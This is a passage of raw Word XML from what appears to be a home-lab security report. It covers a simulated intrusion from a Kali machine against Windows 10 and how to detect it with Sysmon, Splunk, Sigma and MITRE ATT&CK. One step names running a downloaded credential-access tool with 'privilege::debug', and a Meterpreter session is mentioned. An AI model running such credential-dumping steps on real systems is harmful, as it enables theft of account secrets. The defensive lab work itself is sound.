      </w:r>
    </w:p>
    <w:p w14:paraId="2C8A100E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Execute the downloaded credential-access tool and run `privilege::debug`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBD745">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Investigate the activity with Sysmon and Splunk, then correlate the events and map the observed behavior to MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29ABB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create Sigma detections and convert them into Splunk SPL alerts for the observed behaviors</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C035B">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0276BF8C">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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3"/>
        <w:gridCol w:w="3383"/>
        <w:gridCol w:w="3383"/>
      </w:tblGrid>
      <w:tr w14:paraId="1FB2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0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="21630C50">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FB8422C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D584891">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="4E16BBA4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Evidence source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="2967FF5B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Primary analyst question</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65F8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8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7B9413CE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73C130EC">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Initial execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09546BC7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7A203BB5">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 1 + Windows 4688</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0A5BF57C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Which executable ran, with what parent and command line?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53A03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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="64072825">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71C77E7E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>C2 channel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487FB467">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4ABED793">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 3 + ProcessGuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="649E18F9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Which process created the outbound connection?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10DC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8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="70B34556">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19048ED4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>File origin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C599952">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2D1388B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 15 / 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="577B7B39">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Was the file downloaded, and is Mark-of-the-Web evidence present?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DAA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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B015A08">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21DADB05">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Account persistence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64ABCEF6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="23228BAA">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 1 + 4720 / 4732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1CE3AE03">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Was a local user created and privileged?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4B2E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8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="174C93DF">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="691B1856">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Scheduled persistence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9BC833">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="591D989E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 1 + 4698</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4D1B376F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Was a scheduled task created, and under which account?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2496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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6479B666">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A0CFCB1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Tool transfer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16286D36">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DAB94B3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 1 + 3 + 11/15 + DNS 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D08DC04">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Was a native utility used to pull a second-stage tool?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39A9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8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2B69F1E7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57155DFD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Credential activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0D847F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="66D3949E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Sysmon 1 and, if observed, Sysmon 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4A2D12A7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Was credential material actually accessed, or only prepared for?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="382367E9">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9617EF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E7B54">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>02 / SCOPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A878DA">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Scope, Rules of Engagement and Evidence Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C2E19">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB475A4">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This investigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> three-system architecture in th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lab: Kali Linux (192.168.110.141), Windows 10 (192.168.110.156) and Windows 11 running Splunk. The current evidence update is based on the attacker console transcript supplied. The transcript proves command outcomes and the Meterpreter session; Sysmon and Splunk event records have not yet been supplied, so their presence is marked as expected telemetry rather than observed evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED8F808">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
